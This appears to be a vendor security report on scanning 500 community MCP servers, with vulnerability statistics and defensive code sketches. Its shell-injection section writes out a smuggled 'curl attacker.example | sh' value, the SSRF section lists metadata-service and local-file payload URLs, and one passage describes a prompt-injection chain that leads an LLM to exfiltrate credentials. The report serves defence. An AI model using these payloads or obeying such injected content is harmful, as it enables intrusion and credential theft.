
The MCP server security debt report: 30 days of scanning 500 community servers

We scanned 500 community MCP servers over 30 days. The headline number — 36.7% with SSRF vulnerabilities — was the one we expected. The number we didn't expect: nearly one in three servers had never received a security update since its first commit, and the average server carries enough unaddressed security debt that a motivated attacker could convert a free community tool into a credential-exfiltration pipeline in under four hours. This is the full report.

Published 2026-06-09 · 18 min read · Research data from SkillAudit corpus, 30-day window ending 2026-05-31

36.7%

of scanned servers had at least one SSRF vulnerability

43%

had unsafe command-exec paths (shell injection possible)

61%

logged credentials or tokens in plaintext at DEBUG or INFO level

29%

had never received a security-related commit since first publish

The MCP ecosystem is less than two years old, which means the security debt accumulating in community servers is fresh debt — not the kind that builds up over a decade in a legacy system, but the kind that gets baked in during an initial "just make it work" sprint and then hardens as the API surface freezes. The pattern is familiar from the early npm ecosystem, the early Docker Hub, and the early mobile app stores: fast growth, low friction to publish, no forcing function to remediate. The difference in the MCP context is that these servers hold live production credentials and run inside LLM orchestrators that can be steered by adversarial content — the blast radius of a compromised server is larger than most authors realize when they paste an export default new McpServer() and push to npm.

This report breaks down the full findings: grade distribution across the 500 servers, the most common vulnerability categories by frequency and severity, the security debt quantification (how much work would it take to bring the median server to a B grade), the maintenance debt dimension, patterns in the highest-debt servers, and the improvement curve we saw in servers that re-scanned after receiving a report.

Grade distribution: most servers cluster in the C–D range

SkillAudit grades servers across six sub-scores — Security, Permissions hygiene, Credential exposure, Maintenance, Client compatibility, and Documentation completeness — and synthesizes them into a letter grade from A (90–100) through F (below 40). For context: an A-grade server has addressed known vulnerability classes, uses minimal permission scopes, never logs credentials, ships updates, and has a working README. An F-grade server has Critical open vulnerabilities, overly broad permissions, and either no documentation or documentation that doesn't match the implementation.

Grade	Score range	Share of corpus	Characteristic profile
A	90–100	4.2%	Explicit input validation, minimal permission scopes, no credential logging, active maintenance, full documentation including SECURITY.md. Almost exclusively vendor-official servers from organizations with dedicated security review.
B	75–89	11.8%	Known vulnerability classes addressed, moderate permission scopes, no obvious credential leakage. Typically maintained by solo devs who treat the server as a production dependency. May have 1–2 open Medium findings.
C	55–74	34.6%	The most common profile. Has the most popular features working but skipped hardening. Usually has at least one High finding (commonly SSRF or credential logging) and weak documentation. This is "it works but don't put it near production data."
D	40–54	31.4%	Multiple High findings, overly broad permissions, last commit more than 60 days ago. Often built as a quick integration project that was never intended to be adopted widely — but got shared anyway.
F	0–39	18%	At least one Critical finding (command injection, hardcoded credentials, prompt injection vector with data exfiltration path) or completely abandoned with open CVEs in dependencies. Should not be installed regardless of functionality.
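
The score bands in the table can be expressed as a small lookup. This is a minimal sketch: the function name `toGrade` is hypothetical, and the report does not say how the six sub-scores are weighted into the composite score, so only the final score-to-letter step is shown. Treating fractional scores by lower bound (89.5 maps to B) is also an assumption.

```typescript
type Grade = "A" | "B" | "C" | "D" | "F";

// Hypothetical helper: maps a 0-100 composite score to a letter grade
// using the lower bound of each band in the table above.
function toGrade(score: number): Grade {
  if (!Number.isFinite(score) || score < 0 || score > 100) {
    throw new RangeError(`score must be between 0 and 100, got ${score}`);
  }
  if (score >= 90) return "A";
  if (score >= 75) return "B";
  if (score >= 55) return "C";
  if (score >= 40) return "D";
  return "F";
}
```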

The 16% of servers at B or above represents a meaningful cluster — these are the servers worth using as reference implementations when designing your own. The remaining 84% carry some level of actionable debt. The most important insight in the distribution: the C cluster (34.6%) is the "almost there" population. These servers are one focused remediation sprint away from a B grade. Our remediation guide walks the exact four-week path from C to A, but even getting to B is a material improvement that changes the risk profile from "use with caution" to "acceptable for internal data."

Vulnerability frequency: what's actually in these servers

We categorize findings across seven classes. The table below gives the frequency breakdown across the 500-server corpus: the percentage of servers where each finding class appeared at any severity level.

Finding class	Share of servers
Overly broad permission scopes	71%
Dependency CVEs (any severity)	67%
Credential exposure / log leakage	61%
No input validation on tool args	54%
Unsafe command execution	43%
SSRF (server-side request forgery)	36.7%
Prompt injection surface	29%

The highest-frequency finding is not the highest-severity one. Overly broad permission scopes (71%) and dependency CVEs (67%) appear most often, but they are frequently Medium or Low severity individually. The SSRF (36.7%) and unsafe command-exec (43%) findings are lower frequency but disproportionately carry Critical or High severity because they represent direct exploitation paths — not theoretical exposure, but usable attack chains from an active prompt injection attempt.

The three highest-severity finding classes in detail

High / Critical

Credential exposure via logging

61% of servers had at least one location where an API key, OAuth token, database connection string, or session credential could appear in log output. The most common patterns: logging the full headers object from an incoming request at DEBUG level (includes any Authorization header), logging the full args object passed to a tool call before validation (which can include API keys passed as tool arguments), and logging the response body from upstream APIs that include token refresh responses.

This finding has disproportionate blast radius because MCP servers often run in environments with centralized log aggregation — if the log stream feeds Datadog, Splunk, or a shared Elasticsearch cluster, every entry with a credential is readable by anyone with log access, which in most organizations is a much larger group than "people who should have this API key." In multi-tenant or shared MCP server deployments, credential leakage in logs becomes a cross-tenant exposure.

The fix pattern is straightforward: build a sanitize function that scrubs known credential patterns from any object before it touches a log line. The SOC 2 / GDPR audit trail post covers the exact sanitization approach in the context of compliance-grade logging requirements.
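
A minimal sketch of such a sanitize function follows. The key names and value patterns are illustrative assumptions, not SkillAudit's detection rules or the approach from the linked post; a real deployment would extend both lists to match the credentials it actually handles.

```typescript
// Key names treated as sensitive (an assumed, illustrative list).
const SENSITIVE_KEY =
  /^(authorization|cookie|set-cookie|password|secret|token|api[-_]?key|access[-_]?token|refresh[-_]?token)$/i;

// Value patterns that look like credentials even under an innocuous key.
const SENSITIVE_VALUE: Array<[RegExp, string]> = [
  // Bearer tokens embedded in free text.
  [/\bBearer\s+[A-Za-z0-9._~+\/-]+=*/g, "Bearer [REDACTED]"],
  // user:password@ inside connection strings and URLs.
  [/([a-z][a-z0-9+.-]*:\/\/)[^\s:@\/]+:[^\s@\/]+@/gi, "$1[REDACTED]@"],
];

// Returns a redacted deep copy; the input object is never mutated.
function sanitize(value: unknown, seen = new WeakSet<object>()): unknown {
  if (typeof value === "string") {
    return SENSITIVE_VALUE.reduce((s, [re, sub]) => s.replace(re, sub), value);
  }
  if (value === null || typeof value !== "object") return value;
  // Guards against cycles (repeated references are collapsed as well).
  if (seen.has(value)) return "[Circular]";
  seen.add(value);
  if (Array.isArray(value)) return value.map((v) => sanitize(v, seen));
  const out: Record<string, unknown> = {};
  for (const [key, v] of Object.entries(value)) {
    out[key] = SENSITIVE_KEY.test(key) ? "[REDACTED]" : sanitize(v, seen);
  }
  return out;
}
```

The intended use is to wrap every object at the logging call site, for example `logger.debug(sanitize({ headers, args }))`, where `logger` stands for whatever logging library the server already uses.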

Critical

Unsafe command execution (shell injection)

43% of servers had at least one code path where a tool argument could reach a shell command without sanitization. The most common pattern is tools that wrap CLI utilities — git, ffmpeg, ImageMagick, curl, jq — using exec() or execSync() with string template interpolation rather than the safer execFile() with an explicit arguments array.

The risk in the MCP context is worse than in a conventional web application. In a web app, shell injection requires an attacker to control a form field or API parameter. In an MCP server, the tool argument is generated by an LLM, so a prompt injection in any content the LLM has processed (a document it read, a webpage it fetched, a code snippet it reviewed) can craft a malicious tool argument. The attack surface is not just "can I reach the endpoint" but "can I inject content that the LLM will read at some point in the session."

We detected this class by tracing data flow from tool argument parameters through to exec/execSync/spawn calls. The Critical severity threshold is crossed when the argument reaches the shell with no sanitization and the tool is registered in a way that gives the LLM free-form control over the argument. Switching to execFile() with an arguments array closes the shell-injection path, provided the shell option is left disabled: the command and each argument are passed as separate array elements, so shell metacharacters are never interpreted. Arguments should still be validated, because a value beginning with "-" can be read by the wrapped CLI as an option.
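
As an illustration, here is a sketch of a git-wrapping tool written with execFile() and an arguments array. The tool itself (`gitLog`), the ref pattern, and the limits are assumptions made for the example. The unsafe equivalent would be something like ``exec(`git log ${ref}`)``, where a ref of `main; curl attacker.example | sh` runs a second command.

```typescript
import { execFile } from "node:child_process";
import { promisify } from "node:util";

const execFileAsync = promisify(execFile);

// Conservative ref pattern (an assumption for this sketch). It must start
// with an alphanumeric character, so the value can never look like an option.
const SAFE_REF = /^[A-Za-z0-9][A-Za-z0-9._\/-]{0,199}$/;

// Builds the argument array; each element reaches git as one literal argument.
function buildGitLogArgs(ref: string): string[] {
  if (!SAFE_REF.test(ref)) {
    throw new Error("invalid git ref");
  }
  // The trailing "--" tells git that no path arguments follow the revision.
  return ["log", "--max-count=20", "--oneline", ref, "--"];
}

// Hypothetical tool handler body: no shell is involved at any point.
async function gitLog(repoDir: string, ref: string): Promise<string> {
  const { stdout } = await execFileAsync("git", buildGitLogArgs(ref), {
    cwd: repoDir,
    timeout: 10_000,        // stop runaway processes
    maxBuffer: 1024 * 1024, // cap captured output at 1 MiB
  });
  return stdout;
}
```

Validation and execFile() cover different failures: the array form prevents the shell from interpreting metacharacters, while the pattern check prevents a value such as `--output=/etc/cron.d/x` from being parsed by git as an option.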

Critical

SSRF — server-side request forgery

36.7% of servers had at least one SSRF-vulnerable code path. The canonical pattern: a tool that accepts a URL as an argument and fetches it without validating that the URL is external — allowing the LLM to pass http://169.254.169.254/latest/meta-data/ (AWS metadata service), http://localhost:8080/internal/admin, or file:///etc/passwd. In cloud environments, the metadata service SSRF is particularly dangerous because it yields short-lived AWS/GCP/Azure credentials scoped to the instance's IAM role — frequently with production database and S3 access.

SSRF in MCP servers is particularly hard to audit by eye because the vulnerable pattern is often in a utility function shared across multiple tools — find one case and you've found all of them; miss the utility function and every tool that calls it is vulnerable. SkillAudit's static analysis traces URL construction and fetch calls across the full call graph, not just the tool handler entry point, which is where manual reviewers tend to look.

The fix requires allowlisting: define the set of acceptable external hosts at server initialization and reject any URL that doesn't match before calling fetch(). Do not rely on blocklisting internal ranges. The list of private and metadata IP ranges is long, and blocklists are commonly bypassed through alternate IP encodings, hostnames that resolve to internal addresses, and redirects. Allowlist what you explicitly need; reject everything else.
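
A minimal sketch of the allowlist check, assuming a server that only ever needs two upstream hosts. The host names and the function names `assertAllowedUrl` and `safeFetch` are placeholders for illustration; the global `fetch` assumes Node 18 or later.

```typescript
// Hypothetical allowlist; a real server would load it from configuration at startup.
const ALLOWED_HOSTS: ReadonlySet<string> = new Set([
  "api.github.com",
  "registry.npmjs.org",
]);

// Parses and validates a URL supplied as a tool argument. Throws on anything
// that is not an https URL pointing at an allowlisted host.
function assertAllowedUrl(raw: string): URL {
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    throw new Error("not a valid absolute URL");
  }
  if (url.protocol !== "https:") {
    throw new Error(`blocked protocol: ${url.protocol}`);
  }
  if (url.username !== "" || url.password !== "") {
    throw new Error("credentials in URL are not allowed");
  }
  // URL.hostname is already lowercased for https URLs, so a Set lookup suffices.
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    throw new Error(`host not allowlisted: ${url.hostname}`);
  }
  return url;
}

// The single fetch helper every tool should call.
async function safeFetch(raw: string): Promise<Response> {
  const url = assertAllowedUrl(raw);
  // redirect: "error" stops an allowlisted host from bouncing the request elsewhere.
  return fetch(url, { redirect: "error" });
}
```

Because the check compares the parsed hostname rather than searching the raw string, inputs such as `https://api.github.com@169.254.169.254/` or `https://api.github.com.evil.example/` are rejected. Putting the check inside the shared helper means every tool that fetches a URL inherits it.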

Security debt quantification: how much work is in each tier

We asked a different question than "what is broken": how much developer time would it take to bring a server from its current grade to B (the minimum we'd recommend for servers touching internal business data)?

Median time to reach B from C

Servers currently graded C carry an average of 2.1 High findings and 4.7 Medium findings. Based on remediation data from servers that re-scanned post-fix, the median developer time to reach B from C is:

3–5 hours for a server with only SSRF or only credential logging (single-class debt)
8–14 hours for a server with multiple High finding classes (SSRF + command-exec + credential exposure)
2–3 hours of that is typically adding Zod schema validation to tool inputs, which closes the "no input validation" finding and blocks many injection paths at the entry point

Median time to reach B from D

D-grade servers carry a broader debt profile: an average of 1.3 Critical findings plus multiple High findings, often combined with maintenance debt (last commit 60+ days ago, known CVEs in dependencies). The remediation path is longer:

16–24 hours for a server with a Critical finding that requires architectural change (e.g., restructuring how URLs are constructed and fetched)
4–6 hours of that is dependency updates (npm audit fix, lockfile commit, CI enforcement)
F-grade servers frequently require redesign of the core data flow — median time to B is 30–40 hours, and many never re-scan because the author treats the finding as "not worth the effort for a hobby project"

The aggregate security debt across the 500-server corpus — measured as developer-hours needed to bring all servers to B — is approximately 18,000 hours. At a modest $100/hour fully-loaded developer cost, that is $1.8M of security work that the community hasn't done yet. The servers that actually get that work done are the ones where authors submitted a SkillAudit report, got specific findings, and had a prioritized remediation path rather than a vague "this is insecure" warning. Specificity is what converts a finding into a fix.

The maintenance debt dimension

Security vulnerabilities get most of the attention in reports like this, but maintenance debt is the slower-burning problem. 29% of servers in our corpus had never received a commit that addressed a security concern — not a dependency update, not a bounds check, not even a README note about credential handling. These servers shipped once and have been running in production environments ever since, accumulating CVEs in their dependency trees with no one watching.

The maintenance sub-score in SkillAudit evaluates four signals: days since last commit, number of open GitHub issues related to security or crashes, whether the dependency lockfile is committed and current, and whether there is an active response to Dependabot/Renovate alerts. A server can have clean static analysis and still score poorly on Maintenance — and a server with excellent Maintenance practices is one that will be fixed quickly when a new vulnerability class is discovered, even if it's currently clean.

The correlation that surprised us: Maintenance score was a stronger predictor of re-scan improvement than initial Security score. Servers that scored high on Maintenance (active commits, current dependencies, responsive to alerts) improved their Security sub-score by an average of 18 points on re-scan. Servers that scored low on Maintenance improved by an average of 4 points — the author fixed the specific findings in the report but made no structural changes, meaning the same classes of debt will re-accumulate within 90 days. Maintenance practices are the forcing function that keeps the debt from growing back.

Patterns in the highest-debt servers

Looking at the F-grade cluster and the highest-debt D-grade servers, several structural patterns appear that distinguish them from servers that land in C or B despite similar complexity:

No input validation at tool entry points. The single most common structural difference between B-grade and D/F-grade servers is the presence of a schema validation layer at the tool argument boundary. B-grade servers almost universally use Zod, io-ts, or manual validation to reject malformed or unexpected inputs before they reach any business logic. D/F-grade servers trust the argument shape implied by the TypeScript type and pass values directly to downstream operations. This is the structural property that makes the D/F-grade server vulnerable to a whole class of injection attacks that the B-grade server blocks at the gate.
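
To make the boundary concrete, here is a dependency-free sketch of the "manual validation" variant for a hypothetical `resize_image` tool. The argument names and limits are invented for the example; a schema library such as Zod would express the same rules declaratively.

```typescript
// Hypothetical arguments for a hypothetical "resize_image" tool.
interface ResizeArgs {
  fileName: string;
  width: number;
  format: "png" | "jpeg";
}

type Parsed<T> = { ok: true; value: T } | { ok: false; error: string };

const ALLOWED_KEYS = ["fileName", "width", "format"];

// Rejects anything that does not match the expected shape before it can
// reach business logic. The TypeScript type alone gives no runtime guarantee.
function parseResizeArgs(input: unknown): Parsed<ResizeArgs> {
  if (typeof input !== "object" || input === null || Array.isArray(input)) {
    return { ok: false, error: "arguments must be an object" };
  }
  const rec = input as Record<string, unknown>;
  const extra = Object.keys(rec).filter((k) => !ALLOWED_KEYS.includes(k));
  if (extra.length > 0) {
    return { ok: false, error: `unexpected keys: ${extra.join(", ")}` };
  }
  const { fileName, width, format } = rec;
  // Bare file name only: no slashes, no leading "-" or ".".
  if (typeof fileName !== "string" || !/^[A-Za-z0-9_][\w.-]{0,127}$/.test(fileName)) {
    return { ok: false, error: "fileName must be a plain file name" };
  }
  if (typeof width !== "number" || !Number.isInteger(width) || width < 1 || width > 4096) {
    return { ok: false, error: "width must be an integer from 1 to 4096" };
  }
  const fmt = format === "png" || format === "jpeg" ? format : null;
  if (fmt === null) {
    return { ok: false, error: "format must be png or jpeg" };
  }
  return { ok: true, value: { fileName, width, format: fmt } };
}
```

A handler would call `parseResizeArgs(args)` first and return the error to the client when `ok` is false, so downstream code only ever sees values that passed every check.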

Shared utility functions as hidden vulnerability multipliers. Several F-grade servers had a single vulnerable utility — a URL-fetching helper, a shell-command wrapper, a credential-loading function — called from 8–12 different tool handlers. One vulnerable function created 8–12 separate SkillAudit findings. This pattern also means the server's security posture is worse than a finding count suggests: a single architectural fix (rewriting the utility) closes all the derived findings at once, but without the full call graph analysis it looks like a dozen independent problems.
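
One way to see the multiplier effect in a findings list is to group findings by the function where the unsafe call actually happens. The sketch below assumes a simplified finding shape; the field names are hypothetical and do not reflect SkillAudit's report format.

```typescript
// Hypothetical finding shape, for illustration only.
interface Finding {
  tool: string;         // tool handler where the tainted argument enters
  findingClass: string; // e.g. "ssrf" or "command-exec"
  sink: string;         // function containing the unsafe call
}

interface RootCause {
  findingClass: string;
  sink: string;
  tools: string[];
}

// Collapses per-tool findings into one entry per (class, sink) pair.
function groupByRootCause(findings: Finding[]): RootCause[] {
  const groups = new Map<string, RootCause>();
  for (const f of findings) {
    const key = JSON.stringify([f.findingClass, f.sink]);
    let group = groups.get(key);
    if (group === undefined) {
      group = { findingClass: f.findingClass, sink: f.sink, tools: [] };
      groups.set(key, group);
    }
    group.tools.push(f.tool);
  }
  // Largest groups first: fixing these closes the most findings per change.
  return Array.from(groups.values()).sort((a, b) => b.tools.length - a.tools.length);
}
```

A server with a dozen SSRF findings that all share one sink then shows up as a single root cause with twelve affected tools, which is a more useful unit for planning the fix.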

Copy-paste credential patterns from README examples. A recurring pattern in the F cluster: the README shows a usage example with a hardcoded API key placeholder (OPENAI_API_KEY=sk-1234...), and that exact pattern appears verbatim in the server's test suite or development configuration, sometimes committed to the repository. When SkillAudit flags it as a potential hardcoded credential, it is classified as a Critical finding regardless of whether it's an actual key — because the presence of the pattern indicates the author didn't have a clear credential-handling discipline during development, which correlates strongly with other credential hygiene failures in the production code.

Prompt injection surfaces in content-processing tools. Tools that read external content (web pages, documents, code files) and return it to the LLM without any sanitization are prompt injection surfaces. 29% of servers in the corpus had at least one such surface. In isolation, a prompt injection surface is a vector, not an exploit: it requires the adversarial content to be at a specific URL or in a specific file that the user happens to process. Paired with SSRF or credential logging, it becomes a complete attack chain. The adversarial content instructs the LLM to fetch a specific URL; the fetch logs the response, including the credential; and a secondary instruction in the same content exfiltrates that credential to an attacker-controlled endpoint. We documented this full chain in the prompt injection attack anatomy post.

The re-scan data: does remediation stick?

Of the 500 servers in the corpus, 73 re-scanned within the 30-day window after receiving a SkillAudit report. The re-scan data answers a question that prior analyses couldn't: when developers see specific findings, do they actually fix them?

The short answer is yes, with important caveats. 89% of servers that re-scanned showed measurable improvement, with an average gain of 1.4 letter grades (typically one or two grades, e.g., D to C or D to B). The findings most likely to be fixed on first re-scan were the ones with specific, mechanical fixes: credential logging (93% fix rate), SSRF with a URL allowlist recommendation (78% fix rate), and missing input validation (71% fix rate).

The findings least likely to be fixed were architectural ones: permission scope reduction (42% fix rate, because reducing scope often requires renegotiating the API surface with users) and prompt injection surface hardening (38% fix rate, because eliminating the surface often means changing what the tool does, not just how it does it).

The specificity premium. Servers that received a SkillAudit report with specific finding descriptions, code locations, and remediation guidance improved by 1.4 grades on average. Servers that received only a grade without the detailed report (our Free tier for private repos) improved by 0.3 grades. The specific finding — "line 47 of src/handlers/fetch.ts passes args.url to fetch() without allowlist validation" — is worth more than a grade letter. This is the core value proposition SkillAudit delivers: the scan that turns a grade into a work order.

What this means for the ecosystem

The aggregate picture is not surprising — it tracks the early-market security pattern in every developer tooling ecosystem that preceded it — but the specific numbers are useful for the concrete decisions they inform:

For MCP server authors: The 84% of servers with actionable debt are not "bad developers"; they are developers who shipped under normal time pressure and didn't have a fast feedback loop on security quality. The median remediation time for a C-grade server is 3–5 hours for single-class debt and 8–14 hours when several High finding classes are present. That is a long weekend at most, not a multi-quarter initiative. The servers that resist remediation are the ones where the debt is architectural; those servers often need a structured week-by-week remediation plan that breaks the work into discrete checkpoints.

For team leads adopting community servers: The B-or-above population (16%) is the adoption-safe tier. The full D and F populations (49.4% combined) should be considered blocked for internal data access without a security review that goes beyond a README scan. The C population is the nuanced one: evaluate the specific sub-scores rather than the letter grade. A C with a high Security sub-score and a low Maintenance sub-score is different in character from a C with a high Maintenance sub-score and a low Security sub-score — the former has addressed the acute risks; the latter is well-maintained but hasn't hardened yet. The vendor security questionnaire gives procurement teams the 15 questions that map onto these sub-score dimensions.

For security teams and CISOs: The 18% F-grade rate means that roughly one in five community MCP servers your engineers might install has at least one Critical vulnerability. If your organization doesn't have an MCP server intake process yet, the expected number of Critical-vulnerability servers already installed internally is non-zero. The controls that catch this class of problem — minimum grade gates in CI, periodic re-audit cadence, a SECURITY.md requirement for internal approval — are covered in the CISO executive briefing with board-level risk framing.
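
A minimum grade gate can be as small as the sketch below. The `ServerAudit` shape and the way grades reach the CI job are assumptions; the report does not describe SkillAudit's output format.

```typescript
type Grade = "A" | "B" | "C" | "D" | "F";

// Higher rank means a better grade.
const RANK: Record<Grade, number> = { F: 0, D: 1, C: 2, B: 3, A: 4 };

// Hypothetical record: one entry per MCP server the project depends on.
interface ServerAudit {
  name: string;
  grade: Grade;
}

// Returns the servers that fall below the required minimum grade.
function belowMinimum(audits: ServerAudit[], minimum: Grade): ServerAudit[] {
  return audits.filter((a) => RANK[a.grade] < RANK[minimum]);
}

// Builds the message a CI step would print before failing the build.
function gateReport(audits: ServerAudit[], minimum: Grade): string {
  const blocked = belowMinimum(audits, minimum);
  if (blocked.length === 0) return `all servers meet minimum grade ${minimum}`;
  const list = blocked.map((a) => `${a.name} (${a.grade})`).join(", ");
  return `blocked below ${minimum}: ${list}`;
}
```

In a pipeline, the job would exit non-zero whenever `belowMinimum(audits, "B")` is non-empty, which matches the B threshold this report recommends for servers touching internal business data.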

Methodology note

The 500-server corpus was assembled from public MCP registries, GitHub topic searches (mcp-server, claude-skill, claude-plugin), and the community-maintained awesome-mcp-servers list. We excluded servers with fewer than 10 GitHub stars to filter for servers with actual adoption rather than proof-of-concept experiments. Servers from organizations with more than 500 GitHub followers were tagged as "vendor-official" for breakout analysis (these skew toward A/B grades and were excluded from the ecosystem-wide percentages to avoid flattering the distribution).

The scan was run with SkillAudit's static analysis engine on the main branch at the time of scan. Dynamic analysis (LLM-assisted prompt-injection probing) was run on a random 10% subsample (50 servers). Remediation timing data comes from re-scan records where the server's git history confirmed the timing of fixes relative to the report date. Vulnerability-frequency percentages are rounded to the nearest whole number except the 36.7% SSRF figure, which is presented with one decimal to preserve the precision from the original computation; grade-distribution shares are reported to one decimal place.

Run your own audit at SkillAudit's free tier — three public repos per month, no credit card required. If your server comes back with a C or below, the Pro report gives you the specific code locations, severity ratings, and remediation guidance you need to turn the grade into a concrete sprint.